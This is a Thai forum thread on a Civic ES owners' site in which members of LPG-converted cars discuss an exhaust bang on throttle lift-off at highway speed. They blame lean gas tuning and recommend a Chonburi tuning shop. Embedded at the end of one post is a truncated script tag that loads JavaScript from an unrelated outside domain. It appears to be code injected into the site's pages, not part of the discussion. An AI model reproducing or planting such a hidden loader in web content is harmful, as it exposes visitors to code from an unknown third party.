ถ้าจูนแก๊ซบางๆๆไว้ ผมดีคือ ประหยัดแก๊ซ ผมที่ตามมาคือ อาการแบคฟาย แปคฟายในที่นี้ของแก๊ซก็คือ หัวฉีดแก๊ซจ่ายแก๊ซออกมาพอดี หรือว่าบางไป ช่วงที่ยกคันเร่ง แก๊ซที่จูนมาบางก็จะเผาไห้มหมด จนไม่เหลือเชื้อเพลิงที่เลี้ยงห้องเผาไห้ม จึงทำให้ลูกสูบตัวที่จุดระเบิด ที่คลายอากาศ+แรงดันไปที่ไอเสีย จะแบคฟายกลับมายังห้องเผาไหม้อีกครับ จึงทำให้เกิด อากาศมากกว่าเชื้อเพลิง จึงมีเสียดัง ปั๊งๆๆครับ

ปล.ถ้าเป็นน้ำมัน จะจูนยังไงก้ไม่แบคฟาย ถ้าเป็นแก๊ซ จูนบางโอกาศแบคฟายมากครับ ขอบคุณครับ


ผมรู้สึกว่ารถมันกินแก๊ซมากนะเติม400บ.วิ่งได้ปามาน300โลคับเกือบไม่ถึงด้วยไม่รู้ว่ากินไปมั้ยก่อนจูนช่างก็บอกผมว่าแก๊ซหนาไปอะคับเลยลดลงมาหน่อยวิ่งจูนกะช่างเกือบหมดวันเลยอะคับแต่ช่างคงไม๋ได้ลองปรับให้หนาขึ้นแน่เลย งงคับรถผมเปนอาไรเนี่ยTT
ได้รับคำขอบคุณจาก: khem_hatyai  Champ_civicES 
pakorn25


ชื่อเล่น: แป๊๊ก

เข้าร่วม: 11 ตุลา 2011
ตอบ: 230

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 461

ที่อยู่: ชลบุรี-บางแสน-ระยอง
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 10 ธันวา 2011 11:36 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
nilkung พิมพ์ว่า:
ผมว่าไม่ใช่แบ๊คไฟร์นะ ถ้ามันเกิดละก็ กรองอากาศคุณเป็นรูโบ๋ใหญ่ๆแน่ แล้วเสียงจะดังมาจากข้างหน้า ที่ จขกท. เล่าคิดว่าเขาได้ยินจากปลายท่อด้านหลัง อาการนี้น่าจะเกิดจากการเผาไหม้ไม่สมบูรณ์นะ เปลี่ยนร้านจูนแก๊สใหม่คับ

เปลี่ยนมา2ร้านแล้วคับร้านแรกบอกให้ดูเรื่องระบบเครื่องแต่ผมก็ขอให้เค้าจูนให้ก็ได้ตามนั้นคับจูนส่งๆเลย ได้อาการเดินเบาไม่เรียบมา ร้าน2นี่ดูแลดีคับสุดท้ายบอกให้หาแคตมาใส่ นี่ก็ว่าจะหาใส่ให้ครบๆอะ พี่ๆมีร้านจูนแถวชลบุรีแนะนำมั่งมั้ยคับ
ได้รับคำขอบคุณจาก: khem_hatyai  Champ_civicES 
pakorn25


ชื่อเล่น: แป๊๊ก

เข้าร่วม: 11 ตุลา 2011
ตอบ: 230

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 461

ที่อยู่: ชลบุรี-บางแสน-ระยอง
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 10 ธันวา 2011 11:39 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
ham_ter พิมพ์ว่า:
pakorn25 พิมพ์ว่า:
ขอบคณคุณส้มจี้ดคับสวดยวดจิงๆ งั้นแสดงว่าเรื่องท่อน่าจะต้ดไปได้เลยใช่มั้ยคับ แก๊สผมก็ใช้หัวฉีดนะเปลี่ยนกรองหม้อต้มและนอกหม้อต้มแล้ว หัวเทียนก็ลองเปลี่ยนแล้วทั้งเบิก0 และแบบเข็ม คอล์ยลองเช็คเองคร่าวๆแล้วก็ไม่น่าเสียแต่ก็ไม่ช้วอะคับสวนสายหัวเทียนนี่มีวิธีเช็คยังไงคับอยากเช็คเองดู

เรื่องหัวเทียนกับระบบจุดระเบิดนี่ไม่ถนัดค่ะ พอดีใช้รถดีเซลมาตลอด มันไม่มีหัวเทียน เพิ่งมีรถเก๋งกะเค้า แค่สองคันนี้เอง รู้แค่คร่าวๆประมาณว่า เอาออกมาดูว่ามีจุดรั่วไหม ดูด้วยตาเปล่า กับอีกวิธีคือ ไปจอดรถที่มืดๆ สตาร์ทเครื่อง เปิดฝากระโปรงแล้วยืนดูว่ามีประกายไฟออกมาไหม ยังไงรอผู้รู้อีกทีค่ะ
อ้อ อีกที่นึงที่น่าสงสัยคือ หม้อต้มไม่รู้ว่าตอนเปลี่ยนกรอง เค้าประกอบดีไหม หม้อต้มอาจจะรั่ว หรือ ไม่สมบูรณ์ จ่ายแก๊สไม่ดีก็เป็นได้ ลองเข้าร้านจูนใหม่ดีกว่านะคะ

รับทราบคับ
ได้รับคำขอบคุณจาก: khem_hatyai  Champ_civicES 
nokmodify


ชื่อเล่น: นกชลบุรี

เข้าร่วม: 08 กรกฎา 2010
ตอบ: 1415

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1292
ให้คำขอบคุณ: 282

ที่อยู่: เมืองชลบุรี
ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 10 ธันวา 2011 12:03 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
pakorn25 พิมพ์ว่า:
nokmodify พิมพ์ว่า:
อาการแบคฟาย ตอนใช้แก๊ซ แก้ยากครับ แต่จะแก้ให้มันเป็นน้อยลงได้
ต้องจูนแก๊ซหนาๆครับ ไปบอกช่างจูนหนาๆ เพราะถ้าจูนหนาๆแก๊ซจะไม่ถูกเผาไหม้หมดก็จะส่งเชื้อเพลิงไปเลี้ยงที่ห้องเผาไห้มได้ตลอดเวลา แม้ยกคันเร่งแล้วก็ตาม

ถ้าจูนแก๊ซบางๆๆไว้ ผมดีคือ ประหยัดแก๊ซ ผมที่ตามมาคือ อาการแบคฟาย แปคฟายในที่นี้ของแก๊ซก็คือ หัวฉีดแก๊ซจ่ายแก๊ซออกมาพอดี หรือว่าบางไป ช่วงที่ยกคันเร่ง แก๊ซที่จูนมาบางก็จะเผาไห้มหมด จนไม่เหลือเชื้อเพลิงที่เลี้ยงห้องเผาไห้ม จึงทำให้ลูกสูบตัวที่จุดระเบิด ที่คลายอากาศ+แรงดันไปที่ไอเสีย จะแบคฟายกลับมายังห้องเผาไหม้อีกครับ จึงทำให้เกิด อากาศมากกว่าเชื้อเพลิง จึงมีเสียดัง ปั๊งๆๆครับ

ปล.ถ้าเป็นน้ำมัน จะจูนยังไงก้ไม่แบคฟาย ถ้าเป็นแก๊ซ จูนบางโอกาศแบคฟายมากครับ ขอบคุณครับ


ผมรู้สึกว่ารถมันกินแก๊ซมากนะเติม400บ.วิ่งได้ปามาน300โลคับเกือบไม่ถึงด้วยไม่รู้ว่ากินไปมั้ยก่อนจูนช่างก็บอกผมว่าแก๊ซหนาไปอะคับเลยลดลงมาหน่อยวิ่งจูนกะช่างเกือบหมดวันเลยอะคับแต่ช่างคงไม๋ได้ลองปรับให้หนาขึ้นแน่เลย งงคับรถผมเปนอาไรเนี่ยTT



ผมว่าเป็นที่ผมผูดนะครับ จากประสบการ์ณตรง เพราะวิ่งน้ำมันทำไมมันปกติกอะ


แก้ไขล่าสุดโดย เมื่อ เสาร์, 10 ธันวา 2011 12:07, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: pakorn25  khem_hatyai 
nokmodify


ชื่อเล่น: นกชลบุรี

เข้าร่วม: 08 กรกฎา 2010
ตอบ: 1415

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1292
ให้คำขอบคุณ: 282

ที่อยู่: เมืองชลบุรี
ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 10 ธันวา 2011 12:05 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
pakorn25 พิมพ์ว่า:
nilkung พิมพ์ว่า:
ผมว่าไม่ใช่แบ๊คไฟร์นะ ถ้ามันเกิดละก็ กรองอากาศคุณเป็นรูโบ๋ใหญ่ๆแน่ แล้วเสียงจะดังมาจากข้างหน้า ที่ จขกท. เล่าคิดว่าเขาได้ยินจากปลายท่อด้านหลัง อาการนี้น่าจะเกิดจากการเผาไหม้ไม่สมบูรณ์นะ เปลี่ยนร้านจูนแก๊สใหม่คับ

เปลี่ยนมา2ร้านแล้วคับร้านแรกบอกให้ดูเรื่องระบบเครื่องแต่ผมก็ขอให้เค้าจูนให้ก็ได้ตามนั้นคับจูนส่งๆเลย ได้อาการเดินเบาไม่เรียบมา ร้าน2นี่ดูแลดีคับสุดท้ายบอกให้หาแคตมาใส่ นี่ก็ว่าจะหาใส่ให้ครบๆอะ พี่ๆมีร้านจูนแถวชลบุรีแนะนำมั่งมั้ยคับ



ผมว่าน่าจะเป็นแบคฟายนะ เพราะว่า วิ่งน้ำมันปกติ

ปล.รถผมติดแก๊ซเหมือนกันครับ เป็นเหมือนกัน จูนหนาจบเลยครับ แต่ก็ยังแบคฟายอยู่ แต่ไม่บ่อย วิ่งน้ำมันไม่แบคฟาย

รถผม จูนแก๊ซ อยู่หนุ่ม ร้านข้างปั๊มแก๊ซบางทรายครับ ย้ำ (ข้างปั๊มนะ ไม่ใช่ในปั๊ม)
ได้รับคำขอบคุณจาก: pakorn25  khem_hatyai 
lordpark


ชื่อเล่น: ปาร์ค

เข้าร่วม: 16 กันยา 2011
ตอบ: 714

Guru ES
Guru ES

ได้รับคำขอบคุณ: 640
ให้คำขอบคุณ: 1517

ที่อยู่: สายไหม นวลจันทร์ เสรีไทย
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 10 ธันวา 2011 12:15 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
รถแรง เทอร์โบ
ได้รับคำขอบคุณจาก: pakorn25 
Saksri


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 กรกฎา 2011
ตอบ: 1401

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1462
ให้คำขอบคุณ: 360

ที่อยู่: บางทราย ชลบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
เสาร์, 10 ธันวา 2011 12:57 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
แรงอ่ะ มีเสียงด้วย

อู่หนุ่มเซอร์วิส ข้างปั๊มแก๊สบางทราย +1
038-794106 , 0861456658
ลองโทรเช็คก่อนก็ได้นะ
ได้รับคำขอบคุณจาก: pakorn25  khem_hatyai  nokmodify 
pakorn25


ชื่อเล่น: แป๊๊ก

เข้าร่วม: 11 ตุลา 2011
ตอบ: 230

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 461

ที่อยู่: ชลบุรี-บางแสน-ระยอง
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 10 ธันวา 2011 13:04 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
จะลองไปจูนดูอีกที ขอบคุณพี่นกชลบุรีที่แนะนำคับ อีกนิด คับอาการแบคไฟของพี่นี่ดังออกที่ท่อป่าวคับ
ได้รับคำขอบคุณจาก: khem_hatyai 
pakorn25


ชื่อเล่น: แป๊๊ก

เข้าร่วม: 11 ตุลา 2011
ตอบ: 230

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 461

ที่อยู่: ชลบุรี-บางแสน-ระยอง
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 10 ธันวา 2011 13:06 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
LordPark พิมพ์ว่า:
รถแรง เทอร์โบ

ไม่รุไคแอบเอาโบมายัดใส่ป่าว55 <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: khem_hatyai 
nilkung


ชื่อเล่น: นิล

เข้าร่วม: 21 กุมภา 2010
ตอบ: 1477

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1466
ให้คำขอบคุณ: 1317

ที่อยู่: หัวหิน-ปราณบุรี
ปี: 2003
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
เสาร์, 10 ธันวา 2011 14:02 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
หลายๆเหตุผลก็สรุปว่าต้องจูนแก๊สใหม่ หาร้านเจ๋งๆจูนคับ หัวฉีดผมก็ไม่คล่องด้วยสิ รถผมใช้แบบดูดๆๆๆๆ
ได้รับคำขอบคุณจาก: pakorn25    khem_hatyai 
pakorn25


ชื่อเล่น: แป๊๊ก

เข้าร่วม: 11 ตุลา 2011
ตอบ: 230

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 461

ที่อยู่: ชลบุรี-บางแสน-ระยอง
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 10 ธันวา 2011 14:51 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
ระเบิดตูดเล่นไปซักพัก ถ้าหายแล้วจามาอัพบอกคับ
ได้รับคำขอบคุณจาก: khem_hatyai  okuma 
ตอบ
หน้า 1 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.